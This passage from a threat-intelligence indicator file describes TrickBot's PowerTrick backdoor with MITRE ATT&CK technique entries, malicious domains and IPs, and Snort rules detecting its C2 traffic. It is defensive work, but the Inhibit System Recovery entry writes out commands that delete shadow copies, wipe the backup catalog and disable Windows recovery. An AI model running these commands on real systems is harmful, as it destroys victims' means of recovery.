T1005","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data from Local System - T1005\"","description":"Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.\n\nAdversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https:\/\/attack.mitre.org\/techniques\/T1059), such as [cmd](https:\/\/attack.mitre.org\/software\/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https:\/\/attack.mitre.org\/techniques\/T1119) on the local system.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"3c4a2599-71ee-4405-ba1e-0e28414b4bc5","tag_id":"790","meta":{"external_id":["T1005"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1005"]},"local":false},{"id":"922","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data from Information Repositories - T1213","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data from Information Repositories - T1213\"","description":"Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical \/ logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing \/ development credentials\n* Work \/ project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nSpecific common information repositories include:\n\n### Microsoft SharePoint\nFound in many enterprise networks and often used to store and share significant amounts of documentation.\n\n### Atlassian Confluence\nOften found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"d28ef391-8ed4-45dc-bc4a-2f43abf54416","tag_id":"791","meta":{"external_id":["T1213"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["Application logs","Authentication logs","Data loss prevention","Third-party application logs"],"mitre_platforms":["Linux","Windows","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1213","https:\/\/support.office.com\/en-us\/article\/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2","https:\/\/confluence.atlassian.com\/confkb\/how-to-enable-user-access-logging-182943.html"]},"local":false},{"id":"841","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data from Network Shared Drive - T1039","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data from Network Shared Drive - T1039\"","description":"Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration.\n\nAdversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https:\/\/attack.mitre.org\/software\/S0106) may be used to gather information.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"ae676644-d2d2-41b7-af7e-9bed1b55898c","tag_id":"792","meta":{"external_id":["T1039"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1039"]},"local":false},{"id":"1186","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Email Collection - T1114","tag_name":"misp-galaxy:mitre-attack-pattern=\"Email Collection - T1114\"","description":"Adversaries may target user email to collect sensitive information from a target.\n\nFiles containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.\n\nAdversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.\n\nSome adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"1608f3e1-598a-42f4-a01a-2e252e81728f","tag_id":"739","meta":{"external_id":["T1114"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["Authentication logs","File monitoring","Process monitoring","Process use of network"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1114"]},"local":false},{"id":"934","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Man in the Browser - T1185","tag_name":"misp-galaxy:mitre-attack-pattern=\"Man in the Browser - T1185\"","description":"Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)\n\nBrowser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"544b0346-29ad-41e1-a808-501bb4193f47","tag_id":"793","meta":{"external_id":["T1185"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["Authentication logs","Packet capture","Process monitoring","API monitoring"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1185","https:\/\/cobaltstrike.com\/downloads\/csmanual38.pdf","https:\/\/en.wikipedia.org\/wiki\/Man-in-the-browser","https:\/\/www.cobaltstrike.com\/help-browser-pivoting","https:\/\/www.icebrg.io\/blog\/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses"]},"local":false},{"id":"1184","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Screen Capture - T1113","tag_name":"misp-galaxy:mitre-attack-pattern=\"Screen Capture - T1113\"","description":"Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.\n\n### Mac\n\nOn OSX, the native command screencapture<\/code> is used to capture screenshots.\n\n### Linux\n\nOn Linux, there is the native command xwd<\/code>. (Citation: Antiquated Mac Malware)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"0259baeb-9f63-4c69-bf10-eb038c390688","tag_id":"794","meta":{"external_id":["T1113"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["API monitoring","Process monitoring","File monitoring"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1113","https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/01\/new-mac-backdoor-using-antiquated-code\/"]},"local":false},{"id":"1135","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Connection Proxy - T1090","tag_name":"misp-galaxy:mitre-attack-pattern=\"Connection Proxy - T1090\"","description":"A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https:\/\/attack.mitre.org\/software\/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)\n\nThe definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.\n\nThe network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"731f4f55-b6d0-41d1-a7a9-072a66389aea","tag_id":"741","meta":{"external_id":["T1090"],"kill_chain":["mitre-attack:command-and-control"],"mitre_data_sources":["Process use of network","Process monitoring","Netflow\/Enclave netflow","Packet capture"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1090","https:\/\/arxiv.org\/ftp\/arxiv\/papers\/1408\/1408.1136.pdf","http:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/in-depth-look-apt-attack-tools-of-the-trade\/"]},"local":false},{"id":"844","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Custom Command and Control Protocol - T1094","tag_name":"misp-galaxy:mitre-attack-pattern=\"Custom Command and Control Protocol - T1094\"","description":"Adversaries may communicate using a custom command and control protocol instead of encapsulating commands\/data in an existing [Standard Application Layer Protocol](https:\/\/attack.mitre.org\/techniques\/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP\/IP\/another standard network stack.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"f72eb8a8-cd4c-461d-a814-3f862befbf00","tag_id":"795","meta":{"external_id":["T1094"],"kill_chain":["mitre-attack:command-and-control"],"mitre_data_sources":["Packet capture","Netflow\/Enclave netflow","Process use of network","Process monitoring","Host network interface","Network intrusion detection system","Network protocol analysis"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1094","https:\/\/arxiv.org\/ftp\/arxiv\/papers\/1408\/1408.1136.pdf"]},"local":false},{"id":"1125","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data Obfuscation - T1001","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data Obfuscation - T1001\"","description":"Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"ad255bfe-a9e6-4b52-a258-8d3462abe842","tag_id":"740","meta":{"external_id":["T1001"],"kill_chain":["mitre-attack:command-and-control"],"mitre_data_sources":["Packet capture","Process use of network","Process monitoring","Network protocol analysis"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1001","https:\/\/arxiv.org\/ftp\/arxiv\/papers\/1408\/1408.1136.pdf"]},"local":false},{"id":"1194","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data Encoding - T1132","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data Encoding - T1132\"","description":"Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f","tag_id":"796","meta":{"external_id":["T1132"],"kill_chain":["mitre-attack:command-and-control"],"mitre_data_sources":["Packet capture","Process use of network","Process monitoring","Network protocol analysis"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1132","https:\/\/en.wikipedia.org\/wiki\/Binary-to-text_encoding","https:\/\/en.wikipedia.org\/wiki\/Character_encoding","https:\/\/arxiv.org\/ftp\/arxiv\/papers\/1408\/1408.1136.pdf"]},"local":false},{"id":"1127","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Automated Exfiltration - T1020","tag_name":"misp-galaxy:mitre-attack-pattern=\"Automated Exfiltration - T1020\"","description":"Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [Scripting](https:\/\/attack.mitre.org\/techniques\/T1064) after being gathered during Collection. \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https:\/\/attack.mitre.org\/techniques\/T1041) and [Exfiltration Over Alternative Protocol](https:\/\/attack.mitre.org\/techniques\/T1048).","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"774a3188-6ba9-4dc4-879d-d54ee48a5ce9","tag_id":"797","meta":{"external_id":["T1020"],"kill_chain":["mitre-attack:exfiltration"],"mitre_data_sources":["File monitoring","Process monitoring","Process use of network"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1020"]},"local":false},{"id":"798","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Exfiltration Over Command and Control Channel - T1041","tag_name":"misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Command and Control Channel - T1041\"","description":"Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"92d7da27-2d91-488e-a00c-059dc162766d","tag_id":"798","meta":{"external_id":["T1041"],"kill_chain":["mitre-attack:exfiltration"],"mitre_data_sources":["User interface","Process monitoring"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1041","https:\/\/arxiv.org\/ftp\/arxiv\/papers\/1408\/1408.1136.pdf"]},"local":false},{"id":"1015","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Inhibit System Recovery - T1490","tag_name":"misp-galaxy:mitre-attack-pattern=\"Inhibit System Recovery - T1490\"","description":"Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https:\/\/attack.mitre.org\/techniques\/T1485) and [Data Encrypted for Impact](https:\/\/attack.mitre.org\/techniques\/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe<\/code> can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows \/all \/quiet<\/code>\n* [Windows Management Instrumentation](https:\/\/attack.mitre.org\/techniques\/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete<\/code>\n* wbadmin.exe<\/code> can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet<\/code>\n* bcdedit.exe<\/code> can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe \/set {default} bootstatuspolicy ignoreallfailures & bcdedit \/set {default} recoveryenabled no<\/code>","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a","tag_id":"799","meta":{"external_id":["T1490"],"kill_chain":["mitre-attack:impact"],"mitre_data_sources":["Windows Registry","Services","Windows event logs","Process command-line parameters","Process monitoring"],"mitre_platforms":["Windows","macOS","Linux"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1490","https:\/\/blog.talosintelligence.com\/2018\/02\/olympic-destroyer.html","https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/05\/wannacry-malware-profile.html"]},"local":false}]}],"Object":[],"Tag":[{"id":"714","name":"Banker: TrickBot","colour":"#930969","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"133","name":"PowerShell","colour":"#37192a","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"762","name":"PowerTrick","colour":"#000000","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"31","name":"misp-galaxy:malpedia=\"TrickBot\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"726","name":"misp-galaxy:mitre-attack-pattern=\"Spearphishing Link - T1192\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"727","name":"misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"763","name":"misp-galaxy:mitre-attack-pattern=\"Supply Chain Compromise - T1195\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"728","name":"misp-galaxy:mitre-attack-pattern=\"Command-Line Interface - T1059\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"764","name":"misp-galaxy:mitre-attack-pattern=\"PowerShell - T1086\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"765","name":"misp-galaxy:mitre-attack-pattern=\"Local Job Scheduling - T1168\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"766","name":"misp-galaxy:mitre-attack-pattern=\"Scheduled Task - T1053\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"729","name":"misp-galaxy:mitre-attack-pattern=\"Scripting - T1064\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"733","name":"misp-galaxy:mitre-attack-pattern=\"Hooking - T1179\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"767","name":"misp-galaxy:mitre-attack-pattern=\"Registry Run Keys \/ Startup Folder - T1060\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"731","name":"misp-galaxy:mitre-attack-pattern=\"Bypass User Account Control - T1088\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"768","name":"misp-galaxy:mitre-attack-pattern=\"Exploitation for Privilege Escalation - T1068\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"769","name":"misp-galaxy:mitre-attack-pattern=\"Disabling Security Tools - T1089\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"770","name":"misp-galaxy:mitre-attack-pattern=\"Exploitation for Defense Evasion - T1211\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"771","name":"misp-galaxy:mitre-attack-pattern=\"Obfuscated Files or Information - T1027\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"772","name":"misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"773","name":"misp-galaxy:mitre-attack-pattern=\"Regsvr32 - T1117\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"734","name":"misp-galaxy:mitre-attack-pattern=\"Credential Dumping - T1003\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"774","name":"misp-galaxy:mitre-attack-pattern=\"Domain Trust Discovery - T1482\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"735","name":"misp-galaxy:mitre-attack-pattern=\"Account Discovery - T1087\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"775","name":"misp-galaxy:mitre-attack-pattern=\"Network Service Scanning - T1046\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"776","name":"misp-galaxy:mitre-attack-pattern=\"Network Share Discovery - T1135\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"777","name":"misp-galaxy:mitre-attack-pattern=\"Password Policy Discovery - T1201\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"778","name":"misp-galaxy:mitre-attack-pattern=\"File and Directory Discovery - T1083\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"779","name":"misp-galaxy:mitre-attack-pattern=\"Process Discovery - T1057\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"780","name":"misp-galaxy:mitre-attack-pattern=\"Permission Groups Discovery - T1069\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"781","name":"misp-galaxy:mitre-attack-pattern=\"System Information Discovery - T1082\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"782","name":"misp-galaxy:mitre-attack-pattern=\"Security Software Discovery - T1063\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"783","name":"misp-galaxy:mitre-attack-pattern=\"System Service Discovery - T1007\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"784","name":"misp-galaxy:mitre-attack-pattern=\"Virtualization\/Sandbox Evasion - T1497\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"785","name":"misp-galaxy:mitre-attack-pattern=\"Logon Scripts - T1037\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"786","name":"misp-galaxy:mitre-attack-pattern=\"Pass the Ticket - T1097\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"787","name":"misp-galaxy:mitre-attack-pattern=\"Windows Admin Shares - T1077\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"788","name":"misp-galaxy:mitre-attack-pattern=\"Windows Remote Management - T1028\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"789","name":"misp-galaxy:mitre-attack-pattern=\"Automated Collection - T1119\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"737","name":"misp-galaxy:mitre-attack-pattern=\"Data Staged - T1074\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"790","name":"misp-galaxy:mitre-attack-pattern=\"Data from Local System - T1005\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"791","name":"misp-galaxy:mitre-attack-pattern=\"Data from Information Repositories - T1213\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"792","name":"misp-galaxy:mitre-attack-pattern=\"Data from Network Shared Drive - T1039\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"739","name":"misp-galaxy:mitre-attack-pattern=\"Email Collection - T1114\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"793","name":"misp-galaxy:mitre-attack-pattern=\"Man in the Browser - T1185\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"794","name":"misp-galaxy:mitre-attack-pattern=\"Screen Capture - T1113\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"741","name":"misp-galaxy:mitre-attack-pattern=\"Connection Proxy - T1090\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"795","name":"misp-galaxy:mitre-attack-pattern=\"Custom Command and Control Protocol - T1094\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"740","name":"misp-galaxy:mitre-attack-pattern=\"Data Obfuscation - T1001\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"796","name":"misp-galaxy:mitre-attack-pattern=\"Data Encoding - T1132\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"797","name":"misp-galaxy:mitre-attack-pattern=\"Automated Exfiltration - T1020\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"798","name":"misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Command and Control Channel - T1041\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"799","name":"misp-galaxy:mitre-attack-pattern=\"Inhibit System Recovery - T1490\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null}]}}]} 2 | 3 | -------------------------------------------------------------------------------- /IOCs/2020-01-08-powetrick-iocs-vk-misp-json.json .csv: -------------------------------------------------------------------------------- 1 | uuid,event_id,category,type,value,comment,to_ids,date,object_relation,attribute_tag,object_uuid,object_name,object_meta_category 2 | "5e15e7b0-dfe0-4f86-83de-2a9e19d2faa1",1295,"Payload delivery","domain","drive.staticcontent.kz","",1,1578493872,"","","","","" 3 | "5e15e7b0-e1dc-4635-b973-2a9e19d2faa1",1295,"Network activity","domain","web000aaa.info","",1,1578493872,"","","","","" 4 | "5e15e7b0-36c0-4ede-8b82-2a9e19d2faa1",1295,"Network activity","domain","traveldials.com","",1,1578493872,"","","","","" 5 | "5e15e7b0-3c94-4496-adb9-2a9e19d2faa1",1295,"Network activity","domain","northtracing.net","",1,1578493872,"","","","","" 6 | "5e15e7b0-7830-468a-a262-2a9e19d2faa1",1295,"Network activity","domain","magikorigin.me","",1,1578493872,"","","","","" 7 | "5e15e7b0-9ea0-42a5-a643-2a9e19d2faa1",1295,"Network activity","ip-dst","5.9.161.246","",1,1578493872,"","","","","" 8 | "5e15e7b1-3ef8-4abc-ae54-2a9e19d2faa1",1295,"Network activity","ip-dst","192.99.38.41","",1,1578493873,"","","","","" 9 | "5e15ed28-80e4-43e2-baa4-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick Task Request""; content:""POST""; http_method; content:""p=t&p1=""; offset:0; depth:7; http_client_body; classtype:trojan-activity; sid:9000019; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 10 | "5e15ed28-9d20-465c-b6d9-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick Task Checkin""; content:""POST""; http_method; content:""p3=""; offset:0; depth:3; http_client_body; content:""p=i""; http_client_body; content:""p1=""; http_client_body; content:""p2=""; http_client_body; content:""p9=""; http_client_body; classtype:trojan-activity; sid:9000020; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 11 | "5e15ed28-6c04-4d0a-a38a-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick Task Answer""; content:""POST""; http_method; content:""p3=""; offset:0; depth:3; http_client_body; content:""&p5=""; http_client_body; content:""&p=a&""; http_client_body; content:""&p1=""; http_client_body; content:""&p9=""; http_client_body; classtype:trojan-activity; sid:9000021; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 12 | "5e15ed28-2634-412d-bff7-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick Known Key 1""; content:""POST""; http_method; content:""p1=P4YCVQER8UWpfzxVFmVSDyBLzKL3yV6c""; http_client_body; classtype:trojan-activity; sid:9000022; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 13 | "5e15ed28-ce08-43f4-b248-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick Known Key 2""; content:""POST""; http_method; content:""p1=ybEsTxhqPuN4uVkemt6WjxaJN8jBdAGLxKeY9a4CnMTLSSq2""; http_client_body; classtype:trojan-activity; sid:9000026; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 14 | "5e15ed28-6060-43cd-9ea8-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick download ver1 bot""; content:""?x=UDRZQ1ZRRVI4VVdwZnp4VkZtVlNEeUJMektMM3lWNmM=&a=ips""; http_uri; classtype:trojan-activity; sid:9000023; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 15 | "5e15ed28-2a94-49c8-9df5-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick download ver2 bot""; content:""?a=irs&x=""; http_uri; classtype:trojan-activity; sid:9000024; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 16 | "5e15ed28-de84-40c0-958f-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick download bot known key""; 